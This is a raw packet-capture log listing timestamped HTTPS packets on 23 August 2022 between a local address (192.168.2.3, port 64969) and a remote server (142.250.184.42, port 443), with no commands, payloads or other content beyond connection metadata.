Aug 23, 2022 03:43:41.937582016 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.937607050 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.937630892 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.937658072 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.937683105 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.937794924 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.937808037 CEST	64969	443	192.168.2.3	142.250.184.42
Aug 23, 2022 03:43:41.937829018 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.937855959 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.937880993 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.937906981 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.937931061 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.937957048 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.937982082 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.938008070 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.938031912 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.938056946 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.938080072 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.938113928 CEST	64969	443	192.168.2.3	142.250.184.42
Aug 23, 2022 03:43:41.938163996 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.938189030 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.938231945 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.938256979 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.938344955 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.938391924 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.938417912 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.938465118 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.938499928 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.938524008 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.938545942 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.938594103 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.938618898 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.938641071 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.938687086 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.938709021 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.938730955 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.938770056 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.938791990 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.938826084 CEST	64969	443	192.168.2.3	142.250.184.42
Aug 23, 2022 03:43:41.938863039 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.938910961 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.938935041 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.938957930 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.938981056 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.939059973 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.939085007 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.939107895 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.939110041 CEST	64969	443	192.168.2.3	142.250.184.42
Aug 23, 2022 03:43:41.939146996 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.939192057 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.939239025 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.939263105 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.939311981 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.939410925 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.939434052 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.939436913 CEST	64969	443	192.168.2.3	142.250.184.42
Aug 23, 2022 03:43:41.939486980 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.939513922 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.939538002 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.939563036 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.939588070 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.939613104 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.939639091 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.939663887 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.939718962 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.939743996 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.939770937 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.939796925 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.939821959 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.939848900 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.939876080 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.939903021 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.939928055 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.939953089 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.939975023 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.939994097 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.940052032 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.940079927 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.940099001 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.940112114 CEST	64969	443	192.168.2.3	142.250.184.42
Aug 23, 2022 03:43:41.940160990 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.940186024 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.940211058 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.940237045 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.940263033 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.940289021 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.940311909 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.940337896 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.940438032 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.940448046 CEST	64969	443	192.168.2.3	142.250.184.42
Aug 23, 2022 03:43:41.940465927 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.940494061 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.940519094 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.940543890 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.940568924 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.940593004 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.940618038 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.940642118 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.940670013 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.940696001 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.940748930 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.940756083 CEST	64969	443	192.168.2.3	142.250.184.42
Aug 23, 2022 03:43:41.940777063 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.940824032 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.940850019 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.940876007 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.940902948 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.940928936 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.940954924 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.940979958 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.941005945 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.941082001 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.941111088 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.941138029 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.941195011 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.941222906 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.941248894 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.941277027 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.941303968 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.941397905 CEST	64969	443	192.168.2.3	142.250.184.42
Aug 23, 2022 03:43:41.941406965 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.941436052 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.941461086 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.941483974 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.941509962 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.941577911 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.941606998 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.941633940 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.941654921 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.941668987 CEST	64969	443	192.168.2.3	142.250.184.42
Aug 23, 2022 03:43:41.941673040 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.941726923 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.941752911 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.941778898 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.941803932 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.941829920 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.941888094 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.941915035 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.941940069 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.941963911 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.941986084 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.942007065 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.942030907 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.942035913 CEST	64969	443	192.168.2.3	142.250.184.42
Aug 23, 2022 03:43:41.942094088 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.942123890 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.942151070 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.942178965 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.942204952 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.942233086 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.942260027 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.942286968 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.942313910 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.942368031 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.942395926 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.942455053 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.942481041 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.942509890 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.942537069 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.942564011 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.942594051 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.942620039 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.942648888 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.942675114 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.942694902 CEST	64969	443	192.168.2.3	142.250.184.42
Aug 23, 2022 03:43:41.942703009 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.942737103 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.942765951 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.942787886 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.942811966 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.942838907 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.942864895 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.942893982 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.942920923 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.942949057 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.942975998 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.943005085 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.943031073 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.943073034 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.943101883 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.943114996 CEST	64969	443	192.168.2.3	142.250.184.42
Aug 23, 2022 03:43:41.943135977 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.943175077 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.943203926 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.943232059 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.943260908 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.943288088 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.943316936 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.943361998 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.943413019 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.943442106 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.943461895 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.943483114 CEST	64969	443	192.168.2.3	142.250.184.42
Aug 23, 2022 03:43:41.943491936 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.943522930 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.943551064 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.943609953 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.943638086 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.943667889 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.943696976 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.943725109 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.943753958 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.943758965 CEST	64969	443	192.168.2.3	142.250.184.42
Aug 23, 2022 03:43:41.943783045 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.943833113 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.943902969 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.943932056 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.943960905 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.943991899 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.944040060 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.944118023 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.944149971 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.944179058 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.944367886 CEST	64969	443	192.168.2.3	142.250.184.42
Aug 23, 2022 03:43:41.944417000 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.944475889 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.944504023 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.944605112 CEST	64969	443	192.168.2.3	142.250.184.42
Aug 23, 2022 03:43:41.944688082 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.944715977 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.944741964 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.944771051 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.944798946 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.944829941 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.944860935 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.944869995 CEST	64969	443	192.168.2.3	142.250.184.42
Aug 23, 2022 03:43:41.944891930 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.944921970 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.944950104 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.944979906 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.945009947 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.945039988 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.945070028 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.945100069 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.945128918 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.945158005 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.945188046 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.945219040 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.945246935 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.945276976 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.945307016 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.945334911 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.945431948 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.945463896 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.945492029 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.945523024 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.945552111 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.945581913 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.945595980 CEST	64969	443	192.168.2.3	142.250.184.42
Aug 23, 2022 03:43:41.945611954 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.945643902 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.945669889 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.945698977 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.945728064 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.945756912 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.945795059 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.945825100 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.945856094 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.945884943 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.945914984 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.945943117 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.945972919 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.945974112 CEST	64969	443	192.168.2.3	142.250.184.42
Aug 23, 2022 03:43:41.946005106 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.946036100 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.946065903 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.946096897 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.946130037 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.946156979 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.946187019 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.946217060 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.946247101 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.946275949 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.946280956 CEST	64969	443	192.168.2.3	142.250.184.42
Aug 23, 2022 03:43:41.946305037 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.946367025 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.946436882 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.946485996 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.946516037 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.946546078 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.946576118 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.946626902 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.946722984 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.946755886 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.946784973 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.946815014 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.946887970 CEST	64969	443	192.168.2.3	142.250.184.42
Aug 23, 2022 03:43:41.946976900 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.947004080 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.947026014 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.947048903 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.947067976 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.947088003 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.947088003 CEST	64969	443	192.168.2.3	142.250.184.42
Aug 23, 2022 03:43:41.947200060 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.947221994 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.947269917 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.947299004 CEST	64969	443	192.168.2.3	142.250.184.42
Aug 23, 2022 03:43:41.947487116 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.947529078 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.947556973 CEST	64969	443	192.168.2.3	142.250.184.42
Aug 23, 2022 03:43:41.947572947 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.947634935 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.947675943 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.947854042 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.947881937 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.947957993 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.947985888 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.948014021 CEST	64969	443	192.168.2.3	142.250.184.42
Aug 23, 2022 03:43:41.948035002 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.948064089 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.948165894 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.948211908 CEST	64969	443	192.168.2.3	142.250.184.42
Aug 23, 2022 03:43:41.948235035 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.948417902 CEST	64969	443	192.168.2.3	142.250.184.42
Aug 23, 2022 03:43:41.948456049 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.948484898 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.948564053 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.948620081 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.948647022 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.948673010 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.948700905 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.948728085 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.948755026 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.948784113 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.948812962 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.948841095 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.948853016 CEST	64969	443	192.168.2.3	142.250.184.42
Aug 23, 2022 03:43:41.948872089 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.948899031 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.948925972 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.948952913 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.948977947 CEST	443	64969	142.250.184.42	192.168.2.3
